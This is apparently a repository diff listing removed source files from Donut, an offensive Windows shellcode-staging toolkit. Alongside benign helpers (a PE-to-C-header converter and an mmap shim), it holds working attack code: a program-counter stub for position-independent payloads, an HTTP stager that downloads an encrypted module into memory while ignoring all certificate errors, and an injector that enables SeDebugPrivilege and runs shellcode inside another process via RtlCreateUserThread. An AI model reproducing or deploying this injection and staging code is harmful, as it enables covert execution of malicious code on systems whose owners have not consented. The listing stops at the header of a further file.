3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <stdio.h>
32 #include <string.h>
33 #include <stdlib.h>
34 #include <stdint.h>
35 #include <ctype.h>
36
37 #include <fcntl.h>
38 #include <errno.h>
39 #include <sys/types.h>
40 #include <sys/stat.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #include <shlwapi.h>
46 #include "mmap.h"
47 #pragma comment(lib, "shlwapi.lib")
48 #else
49 #define NIX
50 #include <libgen.h>
51 #include <sys/mman.h>
52 #include <unistd.h>
53 #include <pe.h>
54 #endif
55
56 // return pointer to DOS header
57 PIMAGE_DOS_HEADER DosHdr(void *map) {
58 return (PIMAGE_DOS_HEADER)map;
59 }
60
61 // return pointer to NT header
62 PIMAGE_NT_HEADERS NtHdr (void *map) {
63 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
64 }
65
66 // return pointer to File header
67 PIMAGE_FILE_HEADER FileHdr (void *map) {
68 return &NtHdr(map)->FileHeader;
69 }
70
71 // determines CPU architecture of binary
72 int is32 (void *map) {
73 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
74 }
75
76 // determines CPU architecture of binary
77 int is64 (void *map) {
78 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
79 }
80
81 // return pointer to Optional header
82 void* OptHdr (void *map) {
83 return (void*)&NtHdr(map)->OptionalHeader;
84 }
85
86 // return pointer to first section header
87 PIMAGE_SECTION_HEADER SecHdr (void *map) {
88 PIMAGE_NT_HEADERS nt = NtHdr(map);
89
90 return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
91 nt->FileHeader.SizeOfOptionalHeader);
92 }
93
94 uint32_t DirSize (void *map) {
95 if (is32(map)) {
96 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
97 } else {
98 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
99 }
100 }
101
102 uint32_t SecSize (void *map) {
103 return NtHdr(map)->FileHeader.NumberOfSections;
104 }
105
106 PIMAGE_DATA_DIRECTORY Dirs (void *map) {
107 if (is32(map)) {
108 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
109 } else {
110 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
111 }
112 }
113
114 uint64_t ImgBase (void *map) {
115 if (is32(map)) {
116 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
117 } else {
118 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
119 }
120 }
121
122 // valid dos header?
123 int valid_dos_hdr (void *map) {
124 PIMAGE_DOS_HEADER dos = DosHdr(map);
125
126 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
127 return (dos->e_lfanew != 0);
128 }
129
130 // valid nt headers
131 int valid_nt_hdr (void *map) {
132 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
133 }
134
135 uint32_t rva2ofs (void *map, uint32_t rva) {
136 int i;
137
138 PIMAGE_SECTION_HEADER sh = SecHdr(map);
139
140 for (i=0; i<SecSize(map); i++) {
141 if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
142 return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
143 }
144 return -1;
145 }
146
147 void bin2h(void *map, char *fname, void *bin, uint32_t len) {
148 char label[32], file[32], *str;
149 uint32_t i;
150 uint8_t *p=(uint8_t*)bin;
151 FILE *fd;
152
153 memset(label, 0, sizeof(label));
154 memset(file, 0, sizeof(file));
155
156 #if defined(WINDOWS)
157 str = PathFindFileName(fname);
158 #else
159 str = basename(fname);
160 #endif
161 for(i=0; str[i] != 0 && i < 16;i++) {
162 if(str[i] == '.') {
163 file[i] = label[i] = '_';
164 } else {
165 label[i] = toupper(str[i]);
166 file[i] = tolower(str[i]);
167 }
168 }
169 if(map != NULL) {
170 strcat(label, is32(map) ? "_X86" : "_X64");
171 strcat(file, is32(map) ? "_x86" : "_x64");
172 }
173 strcat(file, ".h");
174
175 fd = fopen(file, "wb");
176
177 if(fd != NULL) {
178 fprintf(fd, "\nunsigned char %s[] = {", label);
179
180 for(i=0;i<len;i++) {
181 if(!(i % 12)) fprintf(fd, "\n ");
182 fprintf(fd, "0x%02x", p[i]);
183 if((i+1) != len) fprintf(fd, ", ");
184 }
185 fprintf(fd, "};\n\n");
186 fclose(fd);
187 printf(" [ saved code to %s\n", file);
188 } else printf(" [ unable to create file : %s\n", file);
189 }
190
191 /**
192 void bin2array(void *map, char *fname, void *bin, uint32_t len) {
193 char label[32], file[32], *str;
194 uint32_t i;
195 uint32_t *p=(uint32_t*)bin;
196 FILE *fd;
197
198 memset(label, 0, sizeof(label));
199 memset(file, 0, sizeof(file));
200
201 #if defined(WINDOWS)
202 str = PathFindFileName(fname);
203 #else
204 str = basename(fname);
205 #endif
206 for(i=0; str[i] != 0 && i < 16;i++) {
207 if(str[i] == '.') {
208 file[i] = label[i] = '_';
209 } else {
210 label[i] = toupper(str[i]);
211 file[i] = tolower(str[i]);
212 }
213 }
214
215 strcat(file, ".h");
216
217 fd = fopen(file, "wb");
218
219 if(fd != NULL) {
220 // align up by 4
221 len = (len & -4) + 4;
222 len >>= 2;
223
224 // declare the array
225 fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
226
227 // initialize array
228 for(i=0; i<len; i++) {
229 fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
230 }
231 fclose(fd);
232 printf(" [ Saved array to %s\n", file);
233 } else printf(" [ unable to create file : %s\n", file);
234 }
235 */
236 // structure of COFF (.obj) file
237
238 //--------------------------//
239 // IMAGE_FILE_HEADER //
240 //--------------------------//
241 // IMAGE_SECTION_HEADER //
242 // * num sections //
243 //--------------------------//
244 // //
245 // //
246 // //
247 // section data //
248 // * num sections //
249 // //
250 // //
251 //--------------------------//
252 // IMAGE_SYMBOL //
253 // * num symbols //
254 //--------------------------//
255 // string table //
256 //--------------------------//
257
258 int main (int argc, char *argv[]) {
259 int fd, i;
260 struct stat fs;
261 uint8_t *map, *cs;
262 PIMAGE_SECTION_HEADER sh;
263 //PIMAGE_FILE_HEADER fh;
264 //PIMAGE_COFF_SYMBOLS_HEADER csh;
265 uint32_t ofs, len;
266
267 if (argc != 2) {
268 printf ("\n [ usage: file2h <file.exe | file.bin>\n");
269 return 0;
270 }
271
272 // open file for reading
273 fd = open(argv[1], O_RDONLY);
274
275 if(fd == 0) {
276 printf(" [ unable to open %s\n", argv[1]);
277 return 0;
278 }
279 // if file has some data
280 if(fstat(fd, &fs) == 0) {
281 // map into memory
282 map = (uint8_t*)mmap(NULL, fs.st_size,
283 PROT_READ, MAP_PRIVATE, fd, 0);
284 if(map != NULL) {
285 if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
286 printf(" [ Found valid DOS and NT header.\n");
287 // get the .text section
288 sh = SecHdr(map);
289 // if a section header was returned
290 if(sh != NULL) {
291 printf(" [ Locating .text section.\n");
292 // locate the .text section
293 for(i=0; i<SecSize(map); i++) {
294 if(strcmp((char*)sh[i].Name, ".text") == 0) {
295 ofs = rva2ofs(map, sh[i].VirtualAddress);
296
297 if(ofs != -1) {
298 cs = (map + ofs);
299 len = sh[i].Misc.VirtualSize;
300 // convert to header file
301 bin2h(map, argv[1], cs, len);
302 break;
303 }
304 }
305 }
306 }
307 } else {
308 printf(" [ No valid DOS or NT header found.\n");
309 // treat file as binary
310 bin2h(NULL, argv[1], map, fs.st_size);
311 //bin2array(NULL, argv[1], map, fs.st_size);
312 }
313 munmap(map, fs.st_size);
314 }
315 }
316 close(fd);
317 return 0;
318 }
payload/exe2h/exe2h.obj less more
Binary diff not shown
+0
-74
payload/exe2h/mmap-windows.c less more
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 CloseHandle(h);
61 ret = MAP_FAILED;
62 }
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
70 }
71
72 #undef DWORD_HI
73 #undef DWORD_LO
payload/exe2h/mmap-windows.obj less more
Binary diff not shown
+0
-45
payload/exe2h/mmap.h less more
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
+0
-61
payload/getpc.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // Function to return the program counter.
32 // Always place this at the end of payload.
33 // Tested with x86 build of MSVC 2019 and MinGW. YMMV.
34 #if defined(_MSC_VER)
35 #if defined(_M_IX86)
36 __declspec(naked) char *get_pc(void) {
37 __asm {
38 call pc_addr
39 pc_addr:
40 pop eax
41 sub eax, 5
42 ret
43 }
44 }
45 #endif
46 #elif defined(__GNUC__)
47 #if defined(__i386__)
48 asm (
49 ".global get_pc\n"
50 ".global _get_pc\n"
51 "_get_pc:\n"
52 "get_pc:\n"
53 " call pc_addr\n"
54 "pc_addr:\n"
55 " pop %eax\n"
56 " sub $5, %eax\n"
57 " ret\n"
58 );
59 #endif
60 #endif
+0
-198
payload/http_client.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL DownloadModule(PDONUT_INSTANCE inst) {
32 HINTERNET hin, con, req;
33 PBYTE buf;
34 DWORD s, n, rd, len, code=0;
35 BOOL bResult = FALSE, bSecure = FALSE;
36 URL_COMPONENTS uc;
37 CHAR host[DONUT_MAX_URL],
38 file[DONUT_MAX_URL];
39
40 // default flags for HTTP client
41 DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
42 INTERNET_FLAG_NO_CACHE_WRITE |
43 INTERNET_FLAG_NO_UI |
44 INTERNET_FLAG_RELOAD |
45 INTERNET_FLAG_NO_AUTO_REDIRECT;
46
47 Memset(&uc, 0, sizeof(uc));
48
49 uc.dwStructSize = sizeof(uc);
50 uc.lpszHostName = host;
51 uc.lpszUrlPath = file;
52 uc.dwHostNameLength = DONUT_MAX_URL;
53 uc.dwUrlPathLength = DONUT_MAX_URL;
54
55 DPRINT("Decoding URL %s", inst->http.url);
56
57 if(!inst->api.InternetCrackUrl(
58 inst->http.url, 0, ICU_DECODE, &uc)) {
59 return FALSE;
60 }
61
62 bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
63
64 // if secure connection, update the flags to ignore
65 // invalid certificates
66 if(bSecure) {
67 flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
68 INTERNET_FLAG_IGNORE_CERT_DATE_INVALID |
69 INTERNET_FLAG_SECURE;
70 }
71
72 DPRINT("Initializing WININET");
73
74 hin = inst->api.InternetOpen(
75 NULL, INTERNET_OPEN_TYPE_PRECONFIG,
76 NULL, NULL, 0);
77
78 if(hin == NULL) return FALSE;
79
80 DPRINT("Creating %s connection for %s",
81 bSecure ? "HTTPS" : "HTTP", host);
82
83 con = inst->api.InternetConnect(
84 hin, host,
85 bSecure ? INTERNET_DEFAULT_HTTPS_PORT : INTERNET_DEFAULT_HTTP_PORT,
86 NULL, NULL,
87 INTERNET_SERVICE_HTTP, 0, 0);
88
89 if(con != NULL) {
90 DPRINT("Creating HTTP %s request for %s",
91 inst->http.req, file);
92
93 req = inst->api.HttpOpenRequest(
94 con, inst->http.req,
95 file, NULL, NULL, NULL, flags, 0);
96
97 if(req != NULL) {
98
99 // see if we should ignore invalid certificates for this request
100 if(bSecure) {
101 if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
102 n = sizeof (s);
103
104 s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
105 SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
106 SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
107 SECURITY_FLAG_IGNORE_WRONG_USAGE |
108 SECURITY_FLAG_IGNORE_REVOCATION;
109
110 DPRINT("Setting option to ignore invalid certificates");
111
112 inst->api.InternetSetOption(
113 req,
114 INTERNET_OPTION_SECURITY_FLAGS,
115 &s,
116 sizeof(s));
117 }
118 }
119 DPRINT("Sending request");
120
121 if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
122 len = sizeof(DWORD);
123 code = 0;
124 DPRINT("Querying status code");
125
126 if(inst->api.HttpQueryInfo(
127 req,
128 HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
129 &code, &len, 0))
130 {
131 DPRINT("Code is %ld", code);
132
133 if(code == HTTP_STATUS_OK) {
134 DPRINT("Querying content length");
135
136 len = sizeof(SIZE_T);
137 inst->mod_len = 0;
138
139 if(inst->api.HttpQueryInfo(
140 req,
141 HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
142 &inst->mod_len, &len, 0))
143 {
144 if(inst->mod_len != 0) {
145 DPRINT("Allocating memory for module");
146
147 inst->module.p = inst->api.VirtualAlloc(
148 NULL, inst->mod_len,
149 MEM_COMMIT | MEM_RESERVE,
150 PAGE_READWRITE);
151
152 if(inst->module.p != NULL) {
153 rd = 0;
154 DPRINT("Downloading module into memory");
155 bResult = inst->api.InternetReadFile(
156 req,
157 inst->module.p,
158 inst->mod_len, &rd);
159 }
160 }
161 }
162 }
163 }
164 }
165 DPRINT("Closing request handle");
166 inst->api.InternetCloseHandle(req);
167 }
168 DPRINT("Closing HTTP connection");
169 inst->api.InternetCloseHandle(con);
170 }
171 DPRINT("Closing internet handle");
172 inst->api.InternetCloseHandle(hin);
173
174 #if !defined(NOCRYPTO)
175 if(bResult) {
176 PDONUT_MODULE mod = inst->module.p;
177
178 DPRINT("Decrypting %lli bytes of module", inst->mod_len);
179
180 donut_decrypt(inst->mod_key.mk,
181 inst->mod_key.ctr,
182 mod,
183 inst->mod_len);
184
185 DPRINT("Generating hash to verify decryption");
186 ULONG64 mac = maru(inst->sig, inst->iv);
187
188 DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
189
190 if(mac != mod->mac) {
191 DPRINT("Decryption failed");
192 return FALSE;
193 }
194 }
195 #endif
196 return bResult;
197 }
+0
-235
payload/inject.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <Windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 #pragma comment(lib, "advapi32.lib")
36 #pragma comment(lib, "shell32.lib")
37 #pragma comment(lib, "user32.lib")
38
39 typedef struct _CLIENT_ID {
40 PVOID UniqueProcess;
41 PVOID UniqueThread;
42 } CLIENT_ID, *PCLIENT_ID;
43
44 typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
45 IN HANDLE ProcessHandle,
46 IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
47 IN BOOLEAN CreateSuspended,
48 IN ULONG StackZeroBits,
49 IN OUT PULONG StackReserved,
50 IN OUT PULONG StackCommit,
51 IN PVOID StartAddress,
52 IN PVOID StartParameter OPTIONAL,
53 OUT PHANDLE ThreadHandle,
54 OUT PCLIENT_ID ClientID);
55
56 BOOL EnablePrivilege(PCHAR szPrivilege){
57 HANDLE hToken;
58 BOOL bResult;
59 LUID luid;
60 TOKEN_PRIVILEGES tp;
61
62 // open token for current process
63 bResult = OpenProcessToken(GetCurrentProcess(),
64 TOKEN_ADJUST_PRIVILEGES, &hToken);
65
66 if(!bResult) return FALSE;
67
68 // lookup privilege
69 bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
70 if(bResult){
71 tp.PrivilegeCount = 1;
72 tp.Privileges[0].Luid = luid;
73 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
74
75 // adjust token
76 bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
77 }
78 CloseHandle(hToken);
79 return bResult;
80 }
81
82 // display error message for last error code
83 VOID xstrerror (PCHAR fmt, ...){
84 PCHAR error=NULL;
85 va_list arglist;
86 CHAR buffer[1024];
87 DWORD dwError=GetLastError();
88
89 va_start(arglist, fmt);
90 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
91 va_end (arglist);
92
93 if (FormatMessage (
94 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
95 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
96 (LPSTR)&error, 0, NULL))
97 {
98 printf(" [ %s : %s\n", buffer, error);
99 LocalFree (error);
100 } else {
101 printf(" [ %s error : %08lX\n", buffer, dwError);
102 }
103 }
104
105 DWORD name2pid(PCHAR procName){
106 HANDLE hSnap;
107 PROCESSENTRY32 pe32;
108 DWORD pid=0;
109
110 // create snapshot of system
111 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
112 if(hSnap == INVALID_HANDLE_VALUE) return 0;
113
114 pe32.dwSize = sizeof(PROCESSENTRY32);
115
116 // get first process
117 if(Process32First(hSnap, &pe32)){
118 do {
119 if(!lstrcmpi(pe32.szExeFile, procName)){
120 pid=pe32.th32ProcessID;
121 break;
122 }
123 } while(Process32Next(hSnap, &pe32));
124 }
125 CloseHandle(hSnap);
126 return pid;
127 }
128
129 BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
130 SIZE_T wr;
131 HANDLE hp,ht;
132 LPVOID cs;
133 RtlCreateUserThread_t pRtlCreateUserThread;
134 HMODULE hn;
135 CLIENT_ID cid;
136 NTSTATUS nt=~0UL;
137 DWORD t;
138
139 // 1. resolve API address
140 hn = GetModuleHandle("ntdll.dll");
141 pRtlCreateUserThread=(RtlCreateUserThread_t)
142 GetProcAddress(hn, "RtlCreateUserThread");
143
144 printf(" [ opening process %li\n", id);
145 // 2. open the target process
146 hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
147
148 if(hp == NULL) return FALSE;
149
150 // 3. allocate executable-read-write (XRW) memory for payload
151 printf(" [ allocating memory for payload.\n");
152 cs=VirtualAllocEx(hp, NULL, codeLen,
153 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
154
155 printf(" [ writing code to %p.\n", cs);
156 // 4. copy the payload to remote memory
157 WriteProcessMemory(hp, cs, code, codeLen, &wr);
158 VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
159
160 printf(" [ press any key to continue.\n");
161 getchar();
162
163 // 5. execute payload in remote process
164 printf(" [ creating new thread.\n");
165 nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
166 NULL, cs, NULL, &ht, &cid);
167
168 printf(" [ nt status is %lx\n", nt);
169 WaitForSingleObject(ht, INFINITE);
170
171 // 6. close remote thread handle
172 CloseHandle(ht);
173
174 // 7. free remote memory
175 printf(" [ freeing memory.\n");
176 VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
177
178 // 8. close remote process handle
179 CloseHandle(hp);
180 return nt == 0; // STATUS_SUCCESS
181 }
182
183 DWORD getdata(PCHAR path, LPVOID *data){
184 HANDLE hf;
185 DWORD len,rd=0;
186
187 // 1. open the file
188 hf=CreateFile(path, GENERIC_READ, 0, 0,
189 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
190
191 if(hf!=INVALID_HANDLE_VALUE){
192 // get file size
193 len=GetFileSize(hf, 0);
194 // allocate memory
195 *data=malloc(len + 16);
196 // read file contents into memory
197 ReadFile(hf, *data, len, &rd, 0);
198 CloseHandle(hf);
199 }
200 return rd;
201 }
202
203 int main(int argc, char *argv[]){
204 LPVOID code;
205 SIZE_T code_len;
206 DWORD pid;
207
208 if (argc != 3){
209 printf("\n [ usage: inject <process id | process name> <payload.bin>\n");
210 return 0;
211 }
212
213 if(!EnablePrivilege(SE_DEBUG_NAME)) {
214 printf(" [ cannot enable SeDebugPrivilege.\n");
215 }
216
217 // get pid
218 pid=atoi(argv[1]);
219 if(pid==0) pid=name2pid(argv[1]);
220
221 if(pid==0) {
222 printf(" [ unable to obtain process id.\n");
223 return 0;
224 }
225 // pic
226 code_len = getdata(argv[2], &code);
227 if(code_len == 0) {
228 printf(" [ unable to read payload.\n");
229 return 0;
230 }
231 injectPIC(pid, code, code_len);
232 free(code);
233 return 0;
234 }
+0
-364
payload/inmem_dotnet.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
